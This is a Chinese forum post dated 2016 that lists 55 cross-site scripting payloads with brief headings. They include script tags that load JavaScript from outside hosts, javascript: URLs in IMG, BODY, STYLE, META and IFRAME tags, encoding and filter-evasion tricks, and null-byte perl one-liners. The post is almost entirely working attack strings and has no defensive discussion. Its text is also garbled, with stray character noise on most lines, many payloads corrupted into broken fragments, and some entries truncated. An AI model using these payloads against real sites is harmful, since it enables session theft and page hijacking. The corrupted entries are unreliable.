(1)普通的XSS JavaScript注入7 @7 B0 B8 M# L8 p. l
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 J, ^0 `4 p5 @$ w- ~(99)另类弹框; l2 x6 x% y0 e
<q/oncut=alert()>1
3 ^9 Z% {4 l' j, k+ n- [<s/onclick=alert()>b
* G4 K! v5 O0 q" n2 U, G. L! ? <XSS=" onclick="alert(1)//">clickme</SSX=">4 E* w* Q6 W2 R
<zzz onclick=alert`1`>clickme</zzz>
; {8 D- I; H% W. q% H5 } <a onclick=alert`1`>clickme</a>* S% I6 T; k) f) i' r" j
<a=">clickme</a=">
3 F6 L: B0 T5 p$ M<a=">clickme</a>& E% [! D/ G' o9 P) {' n. ^2 w
<z=">clickme</z="># J, {( H" [; R
<z onclick=alert`1`>clickme</z>
& Q* r- r% E: J/ P5 w
! g0 a2 ?- j; I(2)IMG标签XSS使用JavaScript命令
$ z( Q/ x& k# x* [<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># M/ S6 y; T$ C: S
' X' m# ^1 L' {0 L
(3)IMG标签无分号无引号
4 ?4 t# S) l/ U- U, N8 P<IMG SRC=javascript:alert(‘XSS’)>
, q5 R9 S- s, c" P* n& h+ q8 Z6 \! r
(4)IMG标签大小写不敏感
( S& r( c9 {1 r! U<IMG SRC=JaVaScRiPt:alert(‘XSS’)>/ ^) w6 `/ L3 A9 f1 L: ~; U
' I" S, x' z9 j3 m* L(5)HTML编码(必须有分号)
# c8 r s i- R* B) B# H<IMG SRC=javascript:alert(“XSS”)>
- _) O$ N' N( s. L6 g1 c; M8 {8 U& B
(6)修正缺陷IMG标签
8 ~9 B* @: f$ j- b<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 T s# W; E! J- U4 J0 E. j8 \* F1 r: r; K+ f1 q% u3 C
(7)formCharCode标签(计算器)
% k% U5 \8 b( T0 N! h4 y! }. f<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ B- @" ]+ s, o u0 Z
4 o( m* F& @7 N& m; I% D* Q" _6 D(8)UTF-8的Unicode编码(计算器)
; S4 x Q- G4 W. h% Y* ^9 o<IMG SRC=jav..省略..S')>
3 N+ s" |( N7 F) l) M* M/ ]9 y G
% ^9 K) x; z6 G(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
Y1 E; x. A% A<IMG SRC=jav..省略..S')>
$ J$ t3 M8 k- h. X* M
! b \5 V* ?- g2 v$ j(10)十六进制编码也是没有分号(计算器)3 E; O1 G' B% E! q/ u' T7 H
<IMG SRC=\'#\'" /span>& c& a7 ^" h% l. E
6 {# S( l, s. R# Y( ?! e
(11)嵌入式标签,将Javascript分开
2 l r' h7 u! `* e' Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>7 W* m7 F3 C y/ C
( ~- O# Y- g) X% t; N: Z0 A
(12)嵌入式编码标签,将Javascript分开# b* n d, }' f! b
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ s) E0 M4 W+ _4 |
; {7 ^# M- g1 m3 ^3 [3 Y. h4 f+ K(13)嵌入式换行符! c7 R4 j3 ?% ^
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 }$ ]% Z6 X/ Y8 c
' h! M" O% Z8 n! A) Z(14)嵌入式回车% ]& f" o- @, F6 L' o- p
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; Q, H0 p! I1 T' F
9 g3 _5 I7 F, O# y% a4 C0 l/ }
(15)嵌入式多行注入JavaScript,这是XSS极端的例子1 `8 m. Q/ A- _* y
<IMG SRC=\'#\'" /span>
: _+ [) @- T2 A1 X( L7 Q5 ]( l9 t' E# v) R7 `" f- G
(16)解决限制字符(要求同页面)2 l* z0 e+ x+ K3 T0 N1 K
<script>z=’document.’</script>
4 Y& o6 m4 u( D<script>z=z+’write(“‘</script>
! O# V* B7 a: q" x7 ?% j<script>z=z+’<script’</script>/ y# Z; W) r9 [6 P1 l4 n
<script>z=z+’ src=ht’</script>9 Y: s w c+ \4 p
<script>z=z+’tp://ww’</script>1 w, `( v7 d. B; r
<script>z=z+’w.shell’</script>
. x; t. w2 k9 j7 z6 L2 F- K. X<script>z=z+’.net/1.’</script>
. {" }$ F# a7 I8 g/ M; Q; ]* N<script>z=z+’js></sc’</script>' P; V% w* p- D/ {) g: E; f
<script>z=z+’ript>”)’</script>
' n" i! E; k# q% X4 z1 o<script>eval_r(z)</script>5 S5 \) l9 E, J! G4 l% n! o! T
4 b& d8 g% l( I( w; ?8 J(17)空字符* i$ c' \2 H' p( `( R6 w' c; w
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; G5 {5 v# X! u' u
# K3 ?: @1 T0 S$ B+ s% B6 V$ p+ i) \1 n(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- y: X8 d6 V4 w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
1 S4 ?9 G) G% n( j# x0 q2 g5 W7 K" D
(19)Spaces和meta前的IMG标签
9 d" l |0 i, M% ^<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>! d7 R4 E" w$ z
0 r1 _# i! j5 h(20)Non-alpha-non-digit XSS
( J2 s! x: H$ C w/ U<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
+ ?+ z5 P' S# X/ p$ p7 O5 ?9 N7 w4 g; S$ I& j0 K5 l9 ^" a
(21)Non-alpha-non-digit XSS to 2; ~2 i# P9 q1 y& P& P6 X. M
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, B3 j/ N# P. X2 Z0 M: r
+ F" x- O4 }( _2 C! _2 \(22)Non-alpha-non-digit XSS to 3 Z# v5 v3 \! n2 V
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>5 @; a3 w* l, {+ f8 o8 B
f$ T" V, H! C R d3 X" h
(23)双开括号- T' O* K9 x- q; b+ f# |. V* k
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ Q D$ u: C4 h' Y% t) K8 P9 w+ M- o2 V0 ]3 i _5 i# `6 D1 V
(24)无结束脚本标记(仅火狐等浏览器)
) z: N1 W8 E- l3 {4 {& D( x7 t5 k<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>" A: w9 l/ f. k! ~9 N
! U* N* K* h1 ~ e: Q0 \& l7 o(25)无结束脚本标记2" m0 k0 C# S& s+ C( M b
<SCRIPT SRC=//3w.org/XSS/xss.js>
. h' `0 }" q7 `7 o' Q% E
9 S; d1 u9 D& F. i, x(26)半开的HTML/JavaScript XSS
3 s% D& G2 Y" ]. |- X<IMG SRC=\'#\'" /span>
, m, h' M" H# a7 m7 `5 m4 [1 v, l( t9 |. H5 i+ y @1 c8 K
(27)双开角括号
+ o6 V# g: Y' v$ a1 H; q<iframe src=http://3w.org/XSS.html <
2 s( ]) n( T7 n; `* t! V9 u& v9 |5 ^7 }
(28)无单引号 双引号 分号" o. A& y6 M$ x' x
<SCRIPT>a=/XSS/& B0 u; l$ \0 E, @& J
alert(a.source)</SCRIPT>
: }( M. ?0 |' k6 I/ X9 `$ l4 }& b. _2 v
(29)换码过滤的JavaScript
" j. A" \, z7 [\”;alert(‘XSS’);//0 Z/ n0 {' g+ f% L
& U: {6 I3 r. N8 a0 e/ U/ X- q- j: G(30)结束Title标签
" n1 D$ g" _, {7 x( `( u# y; T% y _</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& \- w y9 {$ k/ g
! |" x' _! I1 w) C
(31)Input Image
/ @+ X4 H. z2 @/ y: _' B X3 g<INPUT SRC=\'#\'" /span>
, \! @: S! @1 V, Y7 b- U! F
; Q1 G [/ `: j(32)BODY Image
8 z1 i0 O& S4 ?. C7 i( x6 A% L) A<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. S7 v' Q8 E6 X* X
7 o1 J' ?$ P: L4 G' R: E(33)BODY标签
; }' Q6 n: W {: B<BODY(‘XSS’)>
' `3 p0 o- l# X& B- C- X* i
1 F* d5 Z$ o: ~(34)IMG Dynsrc
0 w2 V& Q# u& P; g<IMG DYNSRC=\'#\'" /span>8 c0 w1 |! @7 L; u$ k4 r
9 p( [4 m4 K1 H7 m
(35)IMG Lowsrc( @) O* k, Q# d5 E
<IMG LOWSRC=\'#\'" /span>
6 N. P: r& A# \" C) k! L7 k5 K% G' }' [ ], @( J0 A# g
(36)BGSOUND
! K0 x: g3 k7 Y7 u<BGSOUND SRC=\'#\'" /span>, |2 R8 {& k+ d8 C
" K7 V7 z9 J0 h8 B* q
(37)STYLE sheet
' A1 ?( g4 f' b<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, `0 \9 j6 e: R/ ?$ C( Q- N( v/ l, O3 ]4 `
(38)远程样式表
0 X8 K- c, B5 v<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># ]/ a$ v: ^! c& G8 W
0 `! I! X! ]. N1 m; C7 U
(39)List-style-image(列表式)
: X) D. [$ [/ Y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
3 n5 L' j F3 ^& C6 I4 I# `1 y* k, J4 V
(40)IMG VBscript0 r9 i2 l7 A$ N' b4 a
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS$ F: W0 R: y* i& P0 D2 b( j4 h
6 O' Z1 b# j0 a5 ]( n# g
(41)META链接url
, U' f' M- f2 _0 r5 k8 a<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
, {1 V# S y6 k/ f1 S A, N8 e2 ~5 t- A/ h/ U
(42)Iframe* `4 f( N+ a% q
<IFRAME SRC=\'#\'" /IFRAME>
2 S. i: C$ a, D4 o7 h* b3 c1 w
5 z) _; q! Z V! _6 f" F7 i(43)Frame
* o, R0 u# {) u6 O9 \- ~6 {* T<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>, V& O! \% A% V, L/ ?+ [. c
3 V' R4 d; D, M; v+ y(44)Table, m$ h/ p# Q( ?( E5 u* h" K- @8 n
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> K' i- \' Y1 _ i. e
. r- ~, @2 e6 w0 j0 O$ v
(45)TD
" U7 I2 F9 X4 E$ N<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) ^# u d; c, T& E
1 Q( {3 p( x5 I# r(46)DIV background-image- P5 I# }& A6 Q6 _1 v; Y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" ]0 `: v: G$ b) @4 i/ O9 L- i
+ E! P( U% n# E9 S$ V
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 Q$ a2 K D) t( a<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>) G% P1 j' G8 k7 r" Z+ ?/ A9 C* }) [
, [6 t5 J6 }; [: |(48)DIV expression
; e6 t: t1 n( m# u! u1 N! k5 i<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ E% T8 u% ~) M7 G2 X5 M/ a4 t5 j
(49)STYLE属性分拆表达" P: |' Z0 _; n% B
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>, W. @( r; G2 N. r
! S- g/ A! U) c- {(50)匿名STYLE(组成:开角号和一个字母开头): B( f& f+ Q- }
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ v& p/ v, Z+ S; ~7 S3 E8 b& l& C3 `4 @3 @6 H/ Q( s: E
(51)STYLE background-image) G9 B: q; B2 H
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
2 ^8 P/ I( E; s; z& \$ S* e
7 a, D3 g0 T9 p. B9 e(52)IMG STYLE方式( b9 L; o; c Y+ _& _
exppression(alert(“XSS”))’>+ z% V3 Y. }$ q) W* U
" }% J I2 J7 s1 t& S$ m, t. T, ^1 G* Z, o
(53)STYLE background8 h; T7 z" C- p3 B% h
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* n3 \! c! w. f! Y4 L9 R: U$ |6 w( k
(54)BASE' S# i6 b, [7 x/ y" G- j7 c
<BASE HREF=”javascript:alert(‘XSS’);//”>) A( ?. _$ k0 [( O3 w* q5 n* C
. q6 J' r4 o6 \4 N6 J7 z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 E, r; Y1 g2 ^& ~8 \
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
2 u- g+ s+ |; f3 u |
发表于 2016-4-28 10:06:15
收藏
支持
反对